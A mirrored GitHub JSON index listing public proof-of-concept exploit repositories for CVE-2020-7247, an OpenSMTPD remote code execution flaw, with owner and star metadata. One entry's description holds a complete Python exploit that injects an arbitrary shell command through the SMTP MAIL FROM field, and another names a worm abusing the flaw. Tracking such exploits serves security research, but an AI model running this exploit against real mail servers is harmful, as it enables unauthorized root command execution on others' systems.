mirror/PoC-in-GitHub
1
0
Fork 0
mirror of https://github.com/nomi-sec/PoC-in-GitHub.git synced 2025-01-17 13:22:21 +01:00
Code Issues Projects Releases Packages Wiki Activity Actions
PoC-in-GitHub/2020/CVE-2020-7247.json
motikan2010-bot 0b99cc00b6 Auto Update 2022/02/22 00:15:26
2022-02-22 09:15:26 +09:00

250 lines
No EOL
11 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

[
{
"id": 237289178,
"name": "cve-2020-7247-exploit",
"full_name": "FiroSolutions\/cve-2020-7247-exploit",
"owner": {
"login": "FiroSolutions",
"id": 43434507,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43434507?v=4",
"html_url": "https:\/\/github.com\/FiroSolutions"
},
"html_url": "https:\/\/github.com\/FiroSolutions\/cve-2020-7247-exploit",
"description": "Python exploit of cve-2020-7247",
"fork": false,
"created_at": "2020-01-30T19:29:27Z",
"updated_at": "2022-01-06T12:32:04Z",
"pushed_at": "2020-02-19T10:55:15Z",
"stargazers_count": 25,
"watchers_count": 25,
"forks_count": 17,
"allow_forking": true,
"is_template": false,
"topics": [],
"visibility": "public",
"forks": 17,
"watchers": 25,
"score": 0
},
{
"id": 241011451,
"name": "cve-2020-7247",
"full_name": "superzerosec\/cve-2020-7247",
"owner": {
"login": "superzerosec",
"id": 57648217,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57648217?v=4",
"html_url": "https:\/\/github.com\/superzerosec"
},
"html_url": "https:\/\/github.com\/superzerosec\/cve-2020-7247",
"description": "OpenSMTPD version 6.6.2 remote code execution exploit",
"fork": false,
"created_at": "2020-02-17T03:28:09Z",
"updated_at": "2021-12-05T21:34:44Z",
"pushed_at": "2022-01-15T19:37:31Z",
"stargazers_count": 3,
"watchers_count": 3,
"forks_count": 7,
"allow_forking": true,
"is_template": false,
"topics": [],
"visibility": "public",
"forks": 7,
"watchers": 3,
"score": 0
},
{
"id": 241337606,
"name": "CVE-2020-7247",
"full_name": "r0lh\/CVE-2020-7247",
"owner": {
"login": "r0lh",
"id": 51697374,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51697374?v=4",
"html_url": "https:\/\/github.com\/r0lh"
},
"html_url": "https:\/\/github.com\/r0lh\/CVE-2020-7247",
"description": "Proof Of Concept Exploit for CVE-2020-7247 (Remote Execution on OpenSMTPD < 6.6.2",
"fork": false,
"created_at": "2020-02-18T10:52:38Z",
"updated_at": "2021-12-05T21:34:44Z",
"pushed_at": "2020-02-18T11:08:38Z",
"stargazers_count": 4,
"watchers_count": 4,
"forks_count": 1,
"allow_forking": true,
"is_template": false,
"topics": [],
"visibility": "public",
"forks": 1,
"watchers": 4,
"score": 0
},
{
"id": 334951447,
"name": "CVE-2020-7247",
"full_name": "jopraveen\/CVE-2020-7247",
"owner": {
"login": "jopraveen",
"id": 56404692,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56404692?v=4",
"html_url": "https:\/\/github.com\/jopraveen"
},
"html_url": "https:\/\/github.com\/jopraveen\/CVE-2020-7247",
"description": "This vulnerability exists in OpenBSDs mail server OpenSMTPDs “smtp_mailaddr()” function, and affects OpenBSD version 6.6. This allows an attacker to execute arbitrary shell commands like “sleep 66” as root user",
"fork": false,
"created_at": "2021-02-01T13:01:21Z",
"updated_at": "2022-01-27T06:51:06Z",
"pushed_at": "2021-02-01T13:20:06Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 3,
"allow_forking": true,
"is_template": false,
"topics": [],
"visibility": "public",
"forks": 3,
"watchers": 0,
"score": 0
},
{
"id": 338516393,
"name": "CVE-2020-7247-exploit",
"full_name": "QTranspose\/CVE-2020-7247-exploit",
"owner": {
"login": "QTranspose",
"id": 54239699,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54239699?v=4",
"html_url": "https:\/\/github.com\/QTranspose"
},
"html_url": "https:\/\/github.com\/QTranspose\/CVE-2020-7247-exploit",
"description": "OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution PoC exploit",
"fork": false,
"created_at": "2021-02-13T06:57:47Z",
"updated_at": "2022-01-04T07:09:21Z",
"pushed_at": "2021-02-17T09:23:57Z",
"stargazers_count": 6,
"watchers_count": 6,
"forks_count": 1,
"allow_forking": true,
"is_template": false,
"topics": [],
"visibility": "public",
"forks": 1,
"watchers": 6,
"score": 0
},
{
"id": 378352740,
"name": "CVE-2020-7247",
"full_name": "f4T1H21\/CVE-2020-7247",
"owner": {
"login": "f4T1H21",
"id": 83399767,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83399767?v=4",
"html_url": "https:\/\/github.com\/f4T1H21"
},
"html_url": "https:\/\/github.com\/f4T1H21\/CVE-2020-7247",
"description": "PoC exploit for CVE-2020-7247 OpenSMTPD 6.4.0 < 6.6.1 Remote Code Execution",
"fork": false,
"created_at": "2021-06-19T07:34:42Z",
"updated_at": "2021-07-10T11:26:09Z",
"pushed_at": "2021-07-10T11:26:06Z",
"stargazers_count": 1,
"watchers_count": 1,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"topics": [
"cve",
"cve-2020-7247",
"exploit",
"poc"
],
"visibility": "public",
"forks": 0,
"watchers": 1,
"score": 0
},
{
"id": 417960626,
"name": "OpenSMTPD-6.6.1---Remote-Code-Execution---Linux-remote-Exploit",
"full_name": "Sergio928\/OpenSMTPD-6.6.1---Remote-Code-Execution---Linux-remote-Exploit",
"owner": {
"login": "Sergio928",
"id": 76630472,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76630472?v=4",
"html_url": "https:\/\/github.com\/Sergio928"
},
"html_url": "https:\/\/github.com\/Sergio928\/OpenSMTPD-6.6.1---Remote-Code-Execution---Linux-remote-Exploit",
"description": "EDB-ID: 47984 CVE: 2020-7247 EDB Verified: Author: 1F98D Type: REMOTE Exploit: \/ Platform: LINUX Date: 2020-01-30 Vulnerable App: # Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution # Date: 2020-01-29 # Exploit Author: 1F98D # Original Author: Qualys Security Advisory # Vendor Homepage: https:\/\/www.opensmtpd.org\/ # Software Link: https:\/\/github.com\/OpenSMTPD\/OpenSMTPD\/releases\/tag\/6.6.1p1 # Version: OpenSMTPD < 6.6.2 # Tested on: Debian 9.11 (x64) # CVE: CVE-2020-7247 # References: # https:\/\/www.openwall.com\/lists\/oss-security\/2020\/01\/28\/3 # # OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately # escape dangerous characters from user-controlled input. An attacker # can exploit this to execute arbitrary shell commands on the target. # #!\/usr\/local\/bin\/python3 from socket import * import sys if len(sys.argv) != 4: print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0])) print(\"E.g. {} 127.0.0.1 25 'touch \/tmp\/x'\".format(sys.argv[0])) sys.exit(1) ADDR = sys.argv[1] PORT = int(sys.argv[2]) CMD = sys.argv[3] s = socket(AF_INET, SOCK_STREAM) s.connect((ADDR, PORT)) res = s.recv(1024) if 'OpenSMTPD' not in str(res): print('[!] No OpenSMTPD detected') print('[!] Received {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] OpenSMTPD detected') s.send(b'HELO x\\r\\n') res = s.recv(1024) if '250' not in str(res): print('[!] Error connecting, expected 250') print('[!] Received: {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] Connected, sending payload') s.send(bytes('MAIL FROM:<;{};>\\r\\n'.format(CMD), 'utf-8')) res = s.recv(1024) if '250' not in str(res): print('[!] Error sending payload, expected 250') print('[!] Received: {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] Payload sent') s.send(b'RCPT TO:<root>\\r\\n') s.recv(1024) s.send(b'DATA\\r\\n') s.recv(1024) s.send(b'\\r\\nxxx\\r\\n.\\r\\n') s.recv(1024) s.send(b'QUIT\\r\\n') s.recv(1024) print('[*] Done') ",
"fork": false,
"created_at": "2021-10-16T22:10:47Z",
"updated_at": "2022-01-24T10:31:58Z",
"pushed_at": "2021-10-16T22:10:48Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0
},
{
"id": 432255271,
"name": "CVE-2020-7247-POC",
"full_name": "SimonSchoeni\/CVE-2020-7247-POC",
"owner": {
"login": "SimonSchoeni",
"id": 62761108,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62761108?v=4",
"html_url": "https:\/\/github.com\/SimonSchoeni"
},
"html_url": "https:\/\/github.com\/SimonSchoeni\/CVE-2020-7247-POC",
"description": "Proof of concept for CVE-2020-7247 for educational purposes.",
"fork": false,
"created_at": "2021-11-26T17:28:56Z",
"updated_at": "2021-12-28T12:54:32Z",
"pushed_at": "2022-01-20T18:36:05Z",
"stargazers_count": 1,
"watchers_count": 1,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 1,
"score": 0
},
{
"id": 456468236,
"name": "shai_hulud",
"full_name": "presentdaypresenttime\/shai_hulud",
"owner": {
"login": "presentdaypresenttime",
"id": 92856309,
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92856309?v=4",
"html_url": "https:\/\/github.com\/presentdaypresenttime"
},
"html_url": "https:\/\/github.com\/presentdaypresenttime\/shai_hulud",
"description": "Worm written in python, abuses CVE-2020-7247",
"fork": false,
"created_at": "2022-02-07T10:59:36Z",
"updated_at": "2022-02-07T12:49:21Z",
"pushed_at": "2022-02-21T23:50:25Z",
"stargazers_count": 0,
"watchers_count": 0,
"forks_count": 0,
"allow_forking": true,
"is_template": false,
"topics": [],
"visibility": "public",
"forks": 0,
"watchers": 0,
"score": 0
}
]
Reference in a new issue View git blame Copy permalink